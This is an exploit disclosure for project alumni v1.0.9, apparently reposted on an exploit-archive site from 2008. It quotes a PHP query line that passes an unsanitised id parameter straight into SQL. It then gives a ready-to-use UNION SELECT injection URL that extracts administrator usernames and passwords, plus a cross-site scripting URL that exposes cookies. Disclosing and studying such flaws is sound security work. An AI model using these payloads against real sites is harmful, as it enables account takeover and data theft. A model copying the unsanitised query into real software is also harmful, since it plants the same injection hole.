project alumni v1.0.9 (info.php) SQL Injection Vulnerability

2008-05-09 / 2008-05-10

Credit: Virangar Security Team

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-2117 | CVE-2008-2118

CWE: CWE-89

########################################################################
###############
# #
# ...:::::project alumni v1.0.9 (info.php) SQL Injection Vulnerability ::::.... #
########################################################################
###############
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-------
vuln code in info.php:
line 58:
$result = dbQuery( "SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `ID` = '".$_GET['id']."'" );
---
exploit:
http://site.com/info.php?id='/**/union/**/select/**/1,2,3,concat(alumniU
serName,0x3a,char(58),alumniPassword),5,6,7,8,9,10,11,12,13,14,15,16,17,
18,19/**/from/**/alumni_users/**/where/**/userType=0x61646d696e/*
---
and xss in /pages/news.page.inc :)
http://site.com/index.php?act=news&year=<script>alert(document.cookie)</
script>
-------
young iranian h4ck3rz

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

project alumni v1.0.9 (info.php) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.